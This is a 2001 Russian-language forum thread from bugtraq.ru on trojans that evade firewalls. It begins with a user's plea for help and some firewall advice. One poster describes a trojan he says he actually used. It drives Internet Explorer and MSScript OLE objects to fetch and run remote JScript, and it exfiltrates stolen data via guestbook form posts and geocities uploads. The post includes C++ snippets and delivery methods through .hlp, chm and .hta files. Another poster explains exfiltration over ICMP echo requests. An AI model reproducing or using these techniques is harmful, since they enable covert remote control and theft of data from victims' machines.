информационная безопасность
без паники и всерьез
 подробно о проектеRambler's Top100
Страшный баг в WindowsSpanning Tree Protocol: недокументированное применениеПортрет посетителя
BugTraq.Ru
Русский BugTraq
 Анализ криптографических сетевых... 
 Модель надежности двухузлового... 
 Специальные марковские модели надежности... 
 Microsoft обещает радикально усилить... 
 Ядро Linux избавляется от российских... 
 20 лет Ubuntu 
главная обзор RSN блог библиотека закон бред форум dnet о проекте
bugtraq.ru / форум / hacking
Имя Пароль
ФОРУМ
если вы видите этот текст, отключите в настройках форума использование JavaScript
регистрация





Легенда:
  новое сообщение
  закрытая нитка
  новое сообщение
  в закрытой нитке
  старое сообщение
  • Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
  • Новичкам также крайне полезно ознакомиться с данным документом.
Добавлю... 21.12.01 16:45  Число просмотров: 1296
Автор: Miracle Статус: Незарегистрированный пользователь
<"чистая" ссылка>
> у меня в виндах, например, специальное правило есть,
> запрещающее всем прогам, кроме netscape, SecureCRT и зеБат!
> выходить в инет ;)
Я сзоду все проги и не вспомню: Explorer....и пожалуй ВСЕ:)))
Для мыла и сканера я делаю разовое разрешение если понадобится...:)
> напиши троя для такого клинического случая ;)

Для моего он писать зае**ся!:)))
<hacking>
Борьба с троянами 13.12.01 00:15  
Автор: gUAno Статус: Незарегистрированный пользователь
<"чистая" ссылка>
Люди кто знает может есть какие то новые супернавороченные трояны, которых не видят антивирусы и их коннекты не засекает фаерволл, прописанные ка-то необычно не в реестре или в вин.ини. Устал от того что меня все время один чел находит как только я в инет лезу!!!
Помогите плиззз....
вопросы 13.12.01 05:58  
Автор: йцукенг <jcukeng> Статус: Member
<"чистая" ссылка>
> Люди кто знает может есть какие то новые супернавороченные
> трояны, которых не видят антивирусы и их коннекты не
> засекает фаерволл, прописанные ка-то необычно не в реестре
> или в вин.ини. Устал от того что меня все время один чел
> находит как только я в инет лезу!!!
> Помогите плиззз....

Пока вроде нет:).
Есть подозрение, что ты фв себе криво настроил.
Посему вопросы:

#0. на основании чего ты делаешь вывод, что этот некто тебя находит, когда ты лезешь в инет?
0.1. У тебя случайно не статический IP? :) Если да, то на остальные вопросы можешь не отвечать.
0.2. под какой осью работаешь?
1. Пользуешься ли ты аськой? Если да, юзаешь ли при этом твикер?
2. Какой фв у тебя стоит?
3. Приведи ВСЕ правила твоего фв.
После этого попытаюсь тебе помочь.
вопросы 14.12.01 21:54  
Автор: gUAno Статус: Незарегистрированный пользователь
<"чистая" ссылка>

ФВ - аутпост, аську давно не юзаю, ip - динамический, а вот ось - 98
Может фв следует поменять?
вопросы 15.12.01 09:11  
Автор: Miracle Статус: Незарегистрированный пользователь
<"чистая" ссылка>
>
> ФВ - аутпост, аську давно не юзаю, ip - динамический, а вот
> ось - 98
> Может фв следует поменять?

Скажу только:
Ставь Consel Firewall от Сигнал 9
аутпост тоже неплох. 15.12.01 00:10  
Автор: йцукенг <jcukeng> Статус: Member
<"чистая" ссылка>
> ФВ - аутпост, аську давно не юзаю, ip - динамический, а вот
> ось - 98
> Может фв следует поменять?
ну, если хочешь поменяй.:)
под виндами меня AtGuard вполне устраивает, например. поставь, может и тебе понравится.

но сначала погоняй дрвеб.
и посмотри, что у тебя стоит в автозапуске(смотри, естественно, в реестре - надеюсь, сообразишь где).

привел бы правила фв. я понимаю, что нудно это, но иначе трудно сказать, где у тебя дыра в защите. кстати, логи ведешь?
8-) 13.12.01 09:01  
Автор: Miracle Статус: Незарегистрированный пользователь
<"чистая" ссылка>
> > Люди кто знает может есть какие то новые
> супернавороченные
> > трояны, которых не видят антивирусы и их коннекты не
> > засекает фаерволл, прописанные ка-то необычно не в
> реестре
> > или в вин.ини. Устал от того что меня все время один
> чел
> > находит как только я в инет лезу!!!
> > Помогите плиззз....

Вот если такой троян обойдет мои ФВ-лы пожму челу руку:)))
>
> Пока вроде нет:).
> Есть подозрение, что ты фв себе криво настроил.
> Посему вопросы:
>
> #0. на основании чего ты делаешь вывод, что этот некто тебя
> находит, когда ты лезешь в инет?
> 0.1. У тебя случайно не статический IP? :) Если да, то на
> остальные вопросы можешь не отвечать.
> 0.2. под какой осью работаешь?
> 1. Пользуешься ли ты аськой? Если да, юзаешь ли при этом
> твикер?
> 2. Какой фв у тебя стоит?
> 3. Приведи ВСЕ правила твоего фв.

йцукенг Я конечно понимаю твой альтруизм, но все правила ФВ это сильно:)
Скорее всего статичный IP или Аськин клиент... хотя вероятность Коника тоже есть:)))
> После этого попытаюсь тебе помочь.
Троян, который обходит ФВ - легко! 14.12.01 18:11  
Автор: BioUnit Статус: Незарегистрированный пользователь
<"чистая" ссылка>
> Вот если такой троян обойдет мои ФВ-лы пожму челу руку:)))

Троян, который обходит ФВ - легко!

Троян ----(ФВ)----> "Место встречи" <----- Клиент трояна

Если троян будет не слушать, а сам посылать запросы некоторому хосту ("Место встречи"), функция которого передавать запросы от клиента, то всё должно прокатить.
Оле...жму руку:))) 15.12.01 09:25  
Автор: Miracle Статус: Незарегистрированный пользователь
<"чистая" ссылка>
> > Вот если такой троян обойдет мои ФВ-лы пожму челу
> руку:)))
>
> Троян, который обходит ФВ - легко!
Звучит не убедительно!
Попробуй еще разок:)

> Троян ----(ФВ)----> "Место встречи" <----- Клиент
> трояна

Может в картинках или на пальцах мне покажешь?:)))

> Если троян будет не слушать, а сам посылать запросы
> некоторому хосту ("Место встречи"), функция которого
> передавать запросы от клиента, то всё должно прокатить.

Вот последнее слово "должно"... говорит о том, что ты типа догадываешься или знаешь наверняка?
Стыдно сначала утверждать, а потом самому же сеять сомнения:)))

Чтож касается прослушивания то ты видимо даже не понимаешь о чем говоришь:)))
У меня например за все время пользования различными фаерволами не встречал, чтоб они реагировали на пассивное прослушивание портов!:) Это бред! Это не функция ФВ.
А если троян будет передавать запросу куда-нибудь это уже работа ФВ и => он это заметит, отфильтрует или предложит создать правило, что этого соединения и приложения!
Отсюда вывод: Телепузики тебе еще надо смотреть, а не лапшу на уши людям вешать:)

P.S. Кстати я конечно лукавил и сам знаю несколько способов обойти ФВ, но это не абсолют,а лишь для некоторых "липовых" фаерволов. Но ATGuard как я понимаю тоже обходится одним из таких способов.

Удачи!
какое же ты все таки хамло 23.12.01 17:46  
Автор: hex.sex <Computer-Hitler> Статус: Elderman
<"чистая" ссылка>
Ты близко все принимаешь к сердцу... 25.12.01 14:09  
Автор: Miracle Статус: Незарегистрированный пользователь
<"чистая" ссылка>
Оле...жму руку:))) 17.12.01 12:03  
Автор: BioUnit Статус: Незарегистрированный пользователь
<"чистая" ссылка>
За телепузиков спасибо.
Рассказываю подробнее. Прошу прощение (и некоторое снисхождение) за слабую терминологию, я еще не волшебник, я только учусь...
Я воспльзовался стандартными OLE-серверами IE и MSScript. Сначала загружается некоторая html страница с помощью объекта сервера IE, здесь ФВ ничего не предпринял, хотя объект был создан как CLSCTX_INPROC_SERVER. Но даже при отрицательном результате, можно было бы ещё воспользоваться CLSCTX_LOCAL_SERVER.
Загруженная html страница, содержала в себе обычный текст JScript, который загружался в MSScript и выполнялся. Далее результаты отправлялись обратно через IE по POST.
Т.о. управление трояном усложняется, но появляется автономность и повышается анонимность, т.к. я могу закачать html страницу в любое время, а троян начнет выполнять помещенную на неё прогу (точнее скрипт) в момент своей активизации.
Замечание: скрипт выполняется не в контексте IE, как содержимое html-страницы, а отдельно объектом MSScript, как локальный файл .js, т.о. нет ограничений на операции с файлами, реестром и т.п.

В заключении скажу, что это действительно было опробаванно и работало.
Кроме того скажу, что троян был заслан с помощью .hlp файла. Был и менее надежные способы зысылки, использующие баги IE: html+chm и .hta, но тоже срабатывало: html+chm - около 70% под 98, hta - 70-80% под 98 и 2000 (не сичитая SP2, здесь такое не покатывает)

> > > Вот если такой троян обойдет мои ФВ-лы пожму челу
> > руку:)))
> >
> > Троян, который обходит ФВ - легко!
> Звучит не убедительно!
> Попробуй еще разок:)
>
> > Троян ----(ФВ)----> "Место встречи" <-----
> Клиент
> > трояна
>
> Может в картинках или на пальцах мне покажешь?:)))
>
> > Если троян будет не слушать, а сам посылать запросы
> > некоторому хосту ("Место встречи"), функция которого
> > передавать запросы от клиента, то всё должно
> прокатить.
>
> Вот последнее слово "должно"... говорит о том, что ты типа
> догадываешься или знаешь наверняка?
> Стыдно сначала утверждать, а потом самому же сеять
> сомнения:)))
>
> Чтож касается прослушивания то ты видимо даже не понимаешь
> о чем говоришь:)))
> У меня например за все время пользования различными
> фаерволами не встречал, чтоб они реагировали на пассивное
> прослушивание портов!:) Это бред! Это не функция ФВ.
> А если троян будет передавать запросу куда-нибудь это уже
> работа ФВ и => он это заметит, отфильтрует или предложит
> создать правило, что этого соединения и приложения!
> Отсюда вывод: Телепузики тебе еще надо смотреть, а не лапшу
> на уши людям вешать:)
>
> P.S. Кстати я конечно лукавил и сам знаю несколько способов
> обойти ФВ, но это не абсолют,а лишь для некоторых "липовых"
> фаерволов. Но ATGuard как я понимаю тоже обходится одним из
> таких способов.
>
> Удачи!
:) 21.12.01 16:40  
Автор: Miracle Статус: Незарегистрированный пользователь
<"чистая" ссылка>
> За телепузиков спасибо.
> Рассказываю подробнее. Прошу прощение (и некоторое
> снисхождение) за слабую терминологию, я еще не волшебник, я
> только учусь...
> Я воспльзовался стандартными OLE-серверами IE и MSScript.
> Сначала загружается некоторая html страница с помощью
> объекта сервера IE, здесь ФВ ничего не предпринял, хотя
> объект был создан как CLSCTX_INPROC_SERVER. Но даже при
> отрицательном результате, можно было бы ещё воспользоваться
> CLSCTX_LOCAL_SERVER.
> Загруженная html страница, содержала в себе обычный текст
> JScript, который загружался в MSScript и выполнялся.

Именно!
Я например джавой совсем не пользуюсь по известным причинам:)
Следовательно и скрипт я не получу:) Потом сам скрипт даже если и будет загружен скорее детектируется AVP Scripter ... подобные случаи уже были:)

Далее
> результаты отправлялись обратно через IE по POST.
> Т.о. управление трояном усложняется, но появляется
> автономность и повышается анонимность, т.к. я могу закачать
> html страницу в любое время, а троян начнет выполнять
> помещенную на неё прогу (точнее скрипт) в момент своей
> активизации.

Вот тут подробнее куда ты и как ее будешь качать?

> Замечание: скрипт выполняется не в контексте IE, как
> содержимое html-страницы, а отдельно объектом MSScript, как
> локальный файл .js, т.о. нет ограничений на операции с
> файлами, реестром и т.п.
>
> В заключении скажу, что это действительно было опробаванно
> и работало.
> Кроме того скажу, что троян был заслан с помощью .hlp
> файла. Был и менее надежные способы зысылки, использующие
> баги IE: html+chm и .hta, но тоже срабатывало: html+chm -
> около 70% под 98, hta - 70-80% под 98 и 2000 (не сичитая
> SP2, здесь такое не покатывает)
:) 21.12.01 18:28  
Автор: BioUnit Статус: Незарегистрированный пользователь
<"чистая" ссылка>
> Именно!
> Я например джавой совсем не пользуюсь по известным
> причинам:)
> Следовательно и скрипт я не получу:) Потом сам скрипт даже
> если и будет загружен скорее детектируется AVP Scripter ...
> подобные случаи уже были:)

Что-то я совсем плохо объясняю...
1) скрипт загружается как текстовый документ в IE:
<HTML><BODY>
var fso, f, s;
fso = new ActiveXObject("Scripting.FileSystemObject");
f = fso.CreateTextFile("testfile.txt", false);//true);
f.WriteLine("This is a test.");
f.Close();
</HTML></BODY>
Не думаю, что AVP его отловит. Сейчас у тебя AVP возмутился? А ведь скрипт тремя строчками выше. :о)

2) Далее вырезается с помощью get_innerText:
(GetHtmlDocument())->QueryInterface(IID_IHTMLDocument2, (void**)&pDoc);
pDoc->get_body(&pElem);
pElem->get_innerText(&Code);

3) Загружается в MSScript:
pScriptControl->Language="JScript";
pScriptControl->AddCode(Code);

4) Запускается:
_variant_t outpar=pScriptControl->Run((_bstr_t)FuncName, &args);

Даже если у тебя не установлен MSScritp, его вполне можно закачать и зарегистрировать автоматически трояном. Как буду закачивать? С помощью <IMG SRC=...> опять же через IE.

> > результаты отправлялись обратно через IE по POST.
> Вот тут подробнее куда ты и как ее будешь качать?

В моем случае для простоты я сгружал всё в гостевую книгу на guesbook.ru
5) Загружается страница с формой для ввода нов. сообщения в ГК
6) Заполняется форма результатами работы (текст. инф-я):
pFormElem->item(Variant("comm"), Variant(0), &pdisp);
pdisp-> QueryInterface(IID_IHTMLTextAreaElement, (void**)&pAreaElem);
pAreaElem->put_value(Result);

7) Жмется <Submit>
pFormElem->submit();

"Для простоты" = не заморачивался с написанием "приемной стороны".
Ясно, что можно написать и свой cgi-скрипт, разместить его на каком-нибудь бесплатном хостинге и получать нужную инфо туда. Нет проблем и с передачей файлов, но это понятно. Я (опять же, для простоты) закачивал файлы от "жертвы" на geocities.com через их (geocities) FileManeger, вот только расширения надо изменять, т.к. не все форматы там разрешены к аплоаду.
прикольно, конечно, но есть одно "но" 17.12.01 18:54  
Автор: _йцукенг_из-под_фри Статус: Незарегистрированный пользователь
<"чистая" ссылка>
у меня в виндах, например, специальное правило есть, запрещающее всем прогам, кроме netscape, SecureCRT и зеБат! выходить в инет ;)
напиши троя для такого клинического случая ;)
btw левые проги на своем компе я запускаю крайне неохотно
"прикольно, конечно..." и мне прикольно 23.12.01 03:28  
Автор: Sampan Статус: Незарегистрированный пользователь
<"чистая" ссылка>
> напиши троя для такого клинического случая ;)

Вариант 1.
Исходящие ICMP пакеты. Гарантированно, ты их не блокируешь.
Мне известен случай, когда посредством ICMP (подтип Echo Request - это те пакеты, которые использует ping) был выкачен наружу 2 мб архив! Кстати, из-под двух firewall, один из которых был Cisco PIX, настроенный крутым CCIE.

Вариант 2.
UDP броадкасты с 137 порта. Ты их то-же фильтруешь? С их помощью Виндовз громогласно всем объявляет о своем присутствии.
Кстати, именно так можно находить компьютеры с динамическими IP - по имени!

Совет человеку, которого постоянно находят в сети: для начала поменять имя компьютера (самое простое :-)) Во-вторых, запретить в файрволле UDP IN/OUT local-137 remote-any (если он того позволяет, конечно)
совсем прикольно... 25.12.01 14:16  
Автор: Miracle Статус: Незарегистрированный пользователь
<"чистая" ссылка>
> > напиши троя для такого клинического случая ;)
>
> Вариант 1.
> Исходящие ICMP пакеты. Гарантированно, ты их не блокируешь.

А если такой клинический случай и блокируются или вернее фильтруются?:)
Например я еще давно писал про фильтровку протокола ICMP.

> Мне известен случай, когда посредством ICMP (подтип Echo
> Request - это те пакеты, которые использует ping) был
> выкачен наружу 2 мб архив! Кстати, из-под двух firewall,
> один из которых был Cisco PIX, настроенный крутым CCIE.

Ну это кстати не ново... о этом Трое давно читал уже.
>
> Вариант 2.
> UDP броадкасты с 137 порта. Ты их то-же фильтруешь?

Нет! Я просто их блокирую!)))

> Во-вторых, запретить в файрволле UDP IN/OUT local-137
> remote-any (если он того позволяет, конечно)

Об чем вопрос?:)))
re 23.12.01 11:10  
Автор: йцукенг <jcukeng> Статус: Member
<"чистая" ссылка>
> Вариант 1.
> Исходящие ICMP пакеты. Гарантированно, ты их не блокируешь.
> Мне известен случай, когда посредством ICMP (подтип Echo
> Request - это те пакеты, которые использует ping) был
> выкачен наружу 2 мб архив! Кстати, из-под двух firewall,
> один из которых был Cisco PIX, настроенный крутым CCIE.
очень хороший вариант.
и у меня может прокатить:((.
кстати - что за трой был?

> UDP броадкасты с 137 порта.
такое только дети не закрывают.
udp у меня разрешен только от/к DNS-серверам провайдера. и все.
re 23.12.01 18:45  
Автор: Sampan Статус: Незарегистрированный пользователь
<"чистая" ссылка>
> кстати - что за трой был?

Названия сего чуда не знаю.
Я наблюдал лишь результаты его работы по логам :-( На внутренней машине была запущена неопознанная программа, которая с интервалом 0,5 секунды по определенному внешнему IP посылала Echo Request с необычно большим полем data. Естественно, с этого IP никакие Echo Replay не возвращались. По исходящему траффику ICMP в этот адрес определили объем переданных данных. Внутреннего злодея вычислили, но дело уже было сделано :-(

Сдается мне, что в диком виде такие трояны не существуют. Они пишутся "под заказ". Соответственно, ни какими антивирусами не отлавливаются и файрволлами не блокируются.
Добавлю... 21.12.01 16:45  
Автор: Miracle Статус: Незарегистрированный пользователь
<"чистая" ссылка>
> у меня в виндах, например, специальное правило есть,
> запрещающее всем прогам, кроме netscape, SecureCRT и зеБат!
> выходить в инет ;)
Я сзоду все проги и не вспомню: Explorer....и пожалуй ВСЕ:)))
Для мыла и сканера я делаю разовое разрешение если понадобится...:)
> напиши троя для такого клинического случая ;)

Для моего он писать зае**ся!:)))
Добавлю... 21.12.01 18:39  
Автор: BioUnit Статус: Незарегистрированный пользователь
<"чистая" ссылка>
Во-первых, Нетскапе тоже предоставляет OLE server браузера.
Во-вторых, зеБат, конечно, клево, но ведь юзер может запустить троян из аттачмента и сам, "I Love you" это прекрасно ещё раз продемонстрировал. Тем более, что троян можно запихать в такой безопасный с виду для простого юзера файлик .HLP.
В-третьих, не надо быть таким агрессивным :о)
Не буду я даже и пробовать зае**ся... :о)
Я рассказываю всё это только по тому, что этот способ я уже использовал, то, что надо, получил. Теперь вы либо воспользуйтесь, либо своих юзеров предупредите.

> > у меня в виндах, например, специальное правило есть,
> > запрещающее всем прогам, кроме netscape, SecureCRT и
> зеБат!
> > выходить в инет ;)
> Я сзоду все проги и не вспомню: Explorer....и пожалуй
> ВСЕ:)))
> Для мыла и сканера я делаю разовое разрешение если
> понадобится...:)
> > напиши троя для такого клинического случая ;)
>
> Для моего он писать зае**ся!:)))
1  |  2 >>  »  




Rambler's Top100
Рейтинг@Mail.ru


  Copyright © 2001-2024 Dmitry Leonov   Page build time: 0 s   Design: Vadim Derkach